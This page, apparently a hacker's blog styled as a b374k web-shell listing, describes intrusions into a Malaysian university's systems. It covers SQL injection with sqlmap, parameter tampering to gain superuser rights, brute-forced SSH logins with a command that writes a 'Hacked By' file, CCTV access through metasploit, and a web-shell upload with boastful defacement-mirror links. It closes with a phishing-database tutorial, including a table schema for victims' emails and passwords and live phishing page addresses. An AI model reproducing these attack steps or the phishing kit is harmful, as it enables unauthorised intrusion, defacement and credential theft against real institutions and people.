b374k
v10
today : | at : | safemode : ON
> Contact me : [email protected]
name author perms com modified label

Thank You UTHM ! 0b0xed rwxr-xr-x 14 1:10 PM

Filename Thank You UTHM !
Permission rw-r--r--
Author 0b0xed
Date and Time 1:10 PM
Label
Action



Pentesting UCITV UTHM (Local Area Network) 0b0xed rwxr-xr-x 14 10:58 AM

Filename Pentesting UCITV UTHM (Local Area Network)
Permission rw-r--r--
Author 0b0xed
Date and Time 10:58 AM
Label
Action
This is just a Proof Of Concept , pentesting in http://ucitv3.uthm.edu.my/ for my certificate of appreciation only.

Web to Test : http://ucitv3.uthm.edu.my/ (work in UTHM LAN ONLY)

Bug : A simple SQLinjection

Front Page of ucitv :


Method : Using sqlmap , here is the proof



Proof : The admin page




The Bug Was Reported , Thank YOU !

Pentesting in Intern Place 0b0xed rwxr-xr-x 18 11:30 PM

Filename Pentesting in Intern Place
Permission rw-r--r--
Author 0b0xed
Date and Time 11:30 PM
Label
Action

Found one serious vulnerability that allow attacker to change the data (Cukai,Lesen) . Bug was reported to my supervisor together with how to solve. Thanks !


The bug was reported to supervisor, thank you !

http://sacad.uthm.edu.my/ - Changing User to Super User 0b0xed rwxr-xr-x 12 11:47 PM

Filename http://sacad.uthm.edu.my/ - Changing User to Super User
Permission rw-r--r--
Author 0b0xed
Date and Time 11:47 PM
Label
Action
Tools :
1.Tamper Data

Bug ? tahap ?


Changing 4 to 1

Before :

After :
Result :


Pentesting UTHM WiFi Login 0b0xed rwxr-xr-x 13 4:00 AM

Filename Pentesting UTHM WiFi Login
Permission rw-r--r--
Author 0b0xed
Date and Time 4:00 AM
Label
Action

Nothing is changed during this pentesting.

Bug :
The Password is too easy to guess maybe ? 

✓ Full Site Access
✓ SSH Login

Sorry :)

UTHM CCTV Pentesting 0b0xed rwxr-xr-x 10 2:38 AM

Filename UTHM CCTV Pentesting
Permission rw-r--r--
Author 0b0xed
Date and Time 2:38 AM
Label
Action

When you can control the network, you also can control the devices that connected to that network. 
Discover the network using NMap, and then use penetration tools such as metasploit, here what we got.


I forgot how i entered the cctv, it was like 3-4 years ago 


POC - UTHM WiFi 0b0xed rwxr-xr-x 18 2:06 PM

Filename POC - UTHM WiFi
Permission rw-r--r--
Author 0b0xed
Date and Time 2:06 PM
Label
Action

Website : https://wifilogin.uthm.edu.my:4343 ( wifi )



Website : https://airwave.uthm.edu.my/ ( airwave - wifi management )


p/s : I'm not hacker , just change your password 



[Filtering File Upload] https://community.uthm.edu.my/ 0b0xed rwxr-xr-x 13 12:20 AM

Filename [Filtering File Upload] https://community.uthm.edu.my/
Permission rw-r--r--
Author 0b0xed
Date and Time 12:20 AM
Label
Action

File Upload Vulnerability in community.uthm.edu.my

This bug allow user to upload unnecessary file / fucking shell .



Mirror : - http://zone-h.org/mirror/id/25559304 fuck yea xD
              - http://zone-h.org/mirror/id/24572313

Patch : /dirLIST_files/process_upload.php
Source-code : http://pastebin.com/dSTMJgzk





[POC] ipamwifi.uthm.edu.my - DHCP Server ,maybe ? 0b0xed rwxr-xr-x 14 10:05 PM

Filename [POC] ipamwifi.uthm.edu.my - DHCP Server ,maybe ?
Permission rw-r--r--
Author 0b0xed
Date and Time 10:05 PM
Label
Action

1.Open terminal : ifconfig

  Result : .....

1.Get that point (bug)

           Default Gateway : 10.8.237.254
           DHCP Server : 192.168.240.99

2.Login via SSH : sudo ssh -D 22 [email protected]
   Password ? easy :) , just use simple bruteforce

3.Let your 'footprint' on the site


cd /data1/www/php/interfaces
sudo echo "Hacked By 0b0x3d" >> hack.txt

4.Done ? Discover whole system ,and guess what i got ?

[MySQLi - OOP] Phishing - DB 0b0xed rwxr-xr-x 17 7:37 AM

Filename [MySQLi - OOP] Phishing - DB
Permission rw-r--r--
Author 0b0xed
Date and Time 7:37 AM
Label
Action
Full Source : http://pastebin.com/K5bKMJLx



/.Tutorial

1.Set Up Your MySQL User,Password and DB_Name.
2.Find $username,$password,$dbname and replace it.
3.Open phpmyadmin,excute this SQL .
CREATE TABLE phish(
id INT NOT NULL AUTO_INCREMENT,
PRIMARY KEY(id),
username TEXT,
password TEXT,
victimemail TEXT,
victimpass TEXT,
secretcode TEXT
)
4.If Created,Just Paste INDEX.php to index.php and etc.

Live :
- http://v1.hpi.or.id/phish/index.php (INDEX.php)
- http://v1.hpi.or.id/phish/register.php (REGISTER.php)
- http://v1.hpi.or.id/phish/login.php (LOGIN.php)